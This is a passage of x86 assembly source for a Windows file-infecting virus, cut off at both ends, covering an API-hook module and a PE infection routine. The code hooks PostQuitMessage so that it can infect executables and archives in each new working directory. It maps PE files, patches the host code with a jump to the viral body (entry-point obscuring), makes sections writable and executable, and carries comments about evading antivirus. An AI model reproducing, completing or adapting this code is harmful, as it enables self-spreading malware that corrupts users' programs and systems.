or ah,ah
jnz avStrLoop
clc
mov al,0f9h
itIsAV equ $-1
pop esi
ret
; - findf.inc EOF -
; - hooks.inc BOF -
hookmtx dd 0 ; mutex for multi-threading calls
hookDll db "USER32",0
hookFc1 db "PostQuitMessage",0
;
; Just check for directory changes and infect all files there.
;
setupPerProcess:
lea eax,[hookDll+ebp]
push eax
call dword [_LoadLibraryA+ebp]
or eax,eax
jz failedToHook
lea esi,[hookFc1+ebp]
push esi
push eax
call dword [_GetProcAddress+ebp]
mov ecx,eax
mov [PostQuitMessageHA+ebp],eax
lea esi,[PostQuitMessageH+ebp]
call APIHook
xor eax,eax
mov [hookmtx+ebp],eax ; hook ready
failedToHook:
ret
;
; the hook
;
PostQuitMessageH:
push dword 12345678h
PostQuitMessageHA equ $-4
pushad ; save all
pushfd
call getDelta
mov eax,[hookmtx+ebp] ; ready to infect?
or eax,eax
jnz hookFailed
inc dword [hookmtx+ebp] ; do not disturb
; path0 has current work directory
lea esi,[path1+ebp]
push esi
push dword 260
call dword [_GetCurrentDirectoryA+ebp]
or eax,eax
jz endHook
mov ecx,eax ; if we're still into
lea esi,[path0+ebp] ; the same folder, avoid
lea edi,[path1+ebp] ; infect more files
rep cmpsb
je endHook
mov ecx,eax ; update folder
lea esi,[path1+ebp]
lea edi,[path0+ebp]
rep movsb
call scandirpe ; infect new work
; folder
call findArchives
endHook:
dec dword [hookmtx+ebp] ; ready again
hookFailed:
popfd
popad
ret
;
; My nice (and old) API hook routine.
;
APIHook:
push esi
mov edx,[baseAddr+ebp] ; remember to fix it after
; (probably) reloc!
mov edi,edx
add edi,[edx+3ch] ; begin PE header
mov edi,[edi+80h] ; RVA import
or edi,edi ; uh? no imports??? :)
jz near _skipHookErr
add edi,edx ; add base addr
_searchusrImp:
mov esi,[edi+0ch] ; get name
or esi,esi ; check is not last
jz _skipHookErr
add esi,edx ; add base addr
mov ebx,[esi]
or ebx,20202020h
cmp ebx,"user" ; look for module
jne _nextName
mov bx,[esi+4]
cmp bx,"32" ; module found
je _usrImpFound
_nextName: ; if not found check
add edi,14h ; name of next import
mov esi,[edi] ; module
or esi,esi
jz _skipHookErr
jmp _searchusrImp
_usrImpFound: ; now we have user32
mov esi,[edi+10h] ; get address table
or esi,esi ; heh
jz _skipHookErr
add esi,edx ; add base addr again
mov edi,ecx ; search for API
_nextImp:
lodsd ; get addrs
or eax,eax ; chek is not last
jz _skipHookErr
cmp eax,edi ; cmp with API addr
je _doHook ; found? hook!
jmp _nextImp ; check next in table
_doHook:
sub esi,4
push esi ; save import addr
call dword [_GetCurrentProcess+ebp]
pop esi
pop edx
mov [fileSize+ebp],edx ; tmp storage
lea edi,[padding+ebp]
push edi ; shit
push dword 4
lea edi,[fileSize+ebp]
push edi ; bytes to write
push esi ; where to write
push eax ; current process
call dword [_WriteProcessMemory+ebp]
_skipHook:
ret
_skipHookErr:
pop esi
xor eax,eax
ret
; - hooks.inc EOF -
; - infectpe.inc BOF -
; pretty standard padding value, the idea is several viruses use the
; same value to avoid av can use easy ways to manage them
PADDING equ 101
infectpe:
push esi
push esi
call dword [_GetFileAttributesA+ebp]
pop esi
inc eax
jz near infectionError
dec eax
mov dword [fileAttrib+ebp],eax
push esi
push dword 80h
push esi
call dword [_SetFileAttributesA+ebp]
pop esi
or eax,eax
jz near infectionError
push esi
xor eax,eax
push eax
push dword 80h
push dword 3
push eax
push eax
push dword (80000000h | 40000000h)
push esi
call dword [_CreateFileA+ebp]
inc eax
jz near infectionErrorAttrib
dec eax
mov [fHnd+ebp],eax
push dword 0
push eax
call dword [_GetFileSize+ebp]
inc eax
jz near infectionErrorClose
dec eax
mov [fileSize+ebp],eax
lea eax,[fileTime2+ebp]
push eax
add eax,-8
push eax
add eax,-8
push eax
push dword [fHnd+ebp]
call dword [_GetFileTime+ebp]
or eax,eax
jz near infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push dword 4
push eax
push dword [fHnd+ebp]
call dword [_CreateFileMappingA+ebp]
or eax,eax
jz near infectionErrorClose
mov dword [fhmap+ebp],eax
xor eax,eax
push eax
push eax
push eax
push dword 6
push dword [fhmap+ebp]
call dword [_MapViewOfFile+ebp]
or eax,eax
jz near infectionErrorCloseMap
mov [mapMem+ebp],eax
mov edi,eax
cmp word [edi],'MZ'
jne near infectionErrorCloseUnmap
add edi,[edi+3ch]
cmp eax,edi
jae near infectionErrorCloseUnmap
add eax,[fileSize+ebp]
cmp eax,edi
jbe near infectionErrorCloseUnmap
cmp word [edi],'PE'
jne near infectionErrorCloseUnmap
movzx edx,word [edi+16h]
test edx,2h
jz near infectionErrorCloseUnmap
test edx,2000h
jnz near infectionErrorCloseUnmap
mov dx,[edi+5ch]
dec edx
jz near infectionErrorCloseUnmap
mov esi,edi
mov eax,18h
add ax,[edi+14h]
add edi,eax
mov cx,[esi+06h]
dec cx
mov eax,28h
mul cx
add edi,eax
mov eax,dword [esi+80h] ; 1st we need just one
or eax,eax ; import from k32
jz near infectionErrorCloseUnmap
call rva2raw
jc near infectionErrorCloseUnmap
add eax,[mapMem+ebp]
xchg eax,edx
k32imploop:
mov eax,dword [edx+0ch]
or eax,eax
jz near infectionErrorCloseUnmap
call rva2raw
jc near infectionErrorCloseUnmap
add eax,[mapMem+ebp]
mov ebx,dword [eax]
or ebx,20202020h
cmp ebx,'kern'
jne nextImpMod
mov ebx,dword [eax+4]
or ebx,00002020h
cmp ebx,'el32'
je k32ImpFound
nextImpMod:
add edx,14h
mov eax,dword [edx]
or eax,eax
jz near infectionErrorCloseUnmap
jmp k32imploop
k32ImpFound:
mov eax,[edx+10h]
or eax,eax
jz near infectionErrorCloseUnmap
mov edx,eax
call rva2raw
jc near infectionErrorCloseUnmap
add eax,[mapMem+ebp]
mov eax,[eax]
or eax,eax
jz near infectionErrorCloseUnmap
add edx,[esi+34h]
mov [__imp__+ebp],edx ; we got 1st import
; that will be used to
; get k32 addr in run-time
mov eax,[edi+14h]
add eax,[edi+10h]
mov [virusBeginRaw+ebp],eax
mov eax,[edi+0ch] ; sect rva
add eax,[edi+10h] ; sect raw size
mov [relocTMP+ebp],eax
mov ecx,[esi+34h]
mov [baseAddr+ebp],ecx
add [relocTMP+ebp],ecx
mov eax,[esi+28h]
mov [hostEPTMP+ebp],eax ; reloc and EP ok, now EPO
call rva2raw
jc near infectionErrorCloseUnmap
add eax,[mapMem+ebp]
; we look for...
;
; mov [fs:00000000],esp
; or...
;
; mov esp,ebp
; pop ebp
; ret
; db ffh,ffh,ffh,ffh
; or db 00h,00h,00h,00h
;
; and that's ok.
;
push eax
mov ecx,200h
checkNextAddr:
inc eax
cmp dword [eax],00258964h
jne addrNotFound0
cmp dword [eax+3],00000000h
je addrFound
addrNotFound0:
cmp dword [eax],0c35de58bh
jne addrNotFound1
cmp dword [eax+4],-1
je addrFound
cmp dword [eax+4],0
je addrFound
addrNotFound1:
dec ecx
jnz checkNextAddr
pop eax
push eax
addrFound:
pop edx
sub eax,edx
mov edx,eax
add edx,[esi+34h]
add eax,[hostEPTMP+ebp]
add [hostEPTMP+ebp],edx
call rva2raw
jc near infectionErrorCloseUnmap
add eax,[mapMem+ebp]
push esi
push edi
mov esi,eax
push esi
lea edi,[epobuffTMP+ebp]
mov ecx,5
rep movsb
pop edi
mov al,0e9h
stosb
mov eax,[relocTMP+ebp]
sub eax,[hostEPTMP+ebp]
sub eax,5
stosd
pop edi
pop esi
xor eax,eax
mov [esi+58h],eax
or dword [edi+24h],0c0000000h
and dword [edi+24h],~(02000000h | 10000000h)
mov eax,vSize
add eax,[edi+10h] ; raw size
xor edx,e